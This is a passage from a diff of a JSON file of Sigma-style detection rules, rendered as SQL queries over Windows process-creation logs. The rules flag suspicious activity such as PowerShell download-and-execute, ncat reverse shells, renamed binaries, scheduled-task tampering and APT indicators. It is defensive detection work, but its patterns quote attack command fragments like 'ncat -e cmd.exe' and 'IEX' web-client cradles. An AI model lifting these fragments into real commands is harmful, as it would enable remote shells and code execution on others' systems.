'%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine LIKE 
'%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'ftp.exe' AND NOT (NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_renamed_ftp.yml" }, { - "title": "Shells Spawned by Java", - "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", - "status": "experimental", - "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "title": "Detected Windows Software Discovery", + "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "status": "test", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' 
AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" ], - "filename": "proc_creation_win_java_susp_child_process_2.yml" + "filename": "proc_creation_win_reg_software_discovery.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp", - "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "title": "InfDefaultInstall.exe .inf Execution", + "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_zip_compress.yml" + "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" }, { - "title": "Verclsid.exe Runs COM Object", - "id": "d06be4b9-8045-428b-a567-740a26d9db25", + "title": "Potential Suspicious Registry File Imported Via Reg.EXE", + "id": "62e0298b-e994-4189-bc87-bc699aa62d97", + "status": "experimental", + "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", + "author": "frack113, Nasreddine Bencherchali", + "tags": [ + 
"attack.t1112", + "attack.defense_evasion" + ], + "falsepositives": [ + "Legitimate import of keys" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" + }, + { + "title": "Potential Defense Evasion Via Binary Rename", + "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", "status": "test", - "description": "Detects when verclsid.exe is used to run COM object via GUID", - "author": "Victor Sergeev, oscd.community", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_verclsid_runs_com.yml" + "filename": "proc_creation_win_renamed_binary.yml" }, { - "title": "Suspicious Schtasks Schedule Type With High Privileges", - "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1059" ], "falsepositives": [ - "Some installers were seen using this method of creation unfortunately. 
Filter them in your environment" + "Scripts or tools that download files and execute them" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type_system.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects unusual parent or children of the 
ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% 
/i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1555" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_hktl_secutyxploded.yml" + }, + { + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most 
focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1053.005" ], "falsepositives": [ - "Scripts or tools that download files and execute them" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' 
ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate admin usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", - "id": "48917adc-a28e-4f5d-b729-11e75da8941f", + "title": "DllUnregisterServer Function Call Via Msiexec.EXE", + "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. 
Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.007" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_defender_exclusion.yml" + "filename": "proc_creation_win_msiexec_dll.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "status": "test", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ 
- "attack.execution" + "attack.execution", + "attack.t1204.002" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + }, + { + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", + "status": "test", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' 
AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' 
AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Custom Class Execution via Xwizard", - "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", + "id": "9fbf5927-5261-4284-a71d-f681029ea574", "status": "test", - "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.collection", + "attack.t1560.001" ], 
